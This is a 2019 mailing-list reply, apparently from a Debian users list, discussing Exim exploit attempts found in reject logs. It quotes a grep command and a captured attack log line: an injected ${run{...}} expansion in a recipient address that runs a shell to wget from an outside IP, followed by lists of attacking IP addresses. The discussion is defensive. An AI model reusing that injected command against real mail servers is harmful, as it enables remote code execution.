[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.



On Fri 21 Jun 2019 at 06:36:20 +1000, Andrew McGlashan wrote:

> On 21/6/19 5:52 am, Reco wrote:
> > Plain old grep is more than enough here. This one:
> > 
> > grep 'run{' /var/log/exim4/reject*
> > 
> > finds things like these:
> > 
> > 2019-06-19 18:54:43 H=(service.com) [107.182.225.42]
> > F=<support@service.com> rejected RCPT
> > <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2fxxx.
> xxx.xxx.xxx\x22}}@localhost>:
> > Unrouteable address
> 
> Okay:
>  21 attempts from 8 different IP addresses on one server
>      1	[163.172.157.143]
>      2	[188.138.0.205]
>      3	[23.129.64.152]
>      4	[23.129.64.193]
>      5	[27.69.172.214]
>      6	[45.55.94.254]
>      7	[51.15.227.108]
>      8	[89.248.171.57]
> 
>  28 attempts on another server
>      1	[149.56.142.192]
>      2	[163.172.157.143]
>      3	[188.138.0.205]
>      4	[27.69.172.229]
>      5	[51.15.227.108]
>      6	[51.77.148.55]
>      7	[85.58.114.228]
>      8	[89.248.171.57]
> 
>  17 attempts on another server
>      1	[188.138.0.205]
>      2	[89.248.171.57]
>      3	[98.158.184.125]
> 
> 
> 13 unique IP addresses so far.... (dig -x output)
> 
>      1	149.56.142.192   192.ip-149-56-142.net.
>      2	163.172.157.143  143-157-172-163.rev.cloud.scaleway.com.
>      3	188.138.0.205    static-ip-188-138-0-205.inaddr.ip-pool.com.
>      4	23.129.64.152
>      5	23.129.64.193
>      6	27.69.172.214    localhost.
>      7	27.69.172.229    localhost.
>      8	45.55.94.254
>      9	51.15.227.108    108-227-15-51.rev.cloud.scaleway.com.
>     10	51.77.148.55     55.ip-51-77-148.eu.
>     11	85.58.114.228    228.pool85-58-114.dynamic.orange.es.
>     12	89.248.171.57    scanner20.openportstats.com.
>     13	98.158.184.125   206.217.215.125.static.midphase.com.

So? Looks like a normal day. Announcing exim as version 4.92 (or any
other value) is most unlikely to reduce the number of these attempts.

-- 
Brian.


Reply to: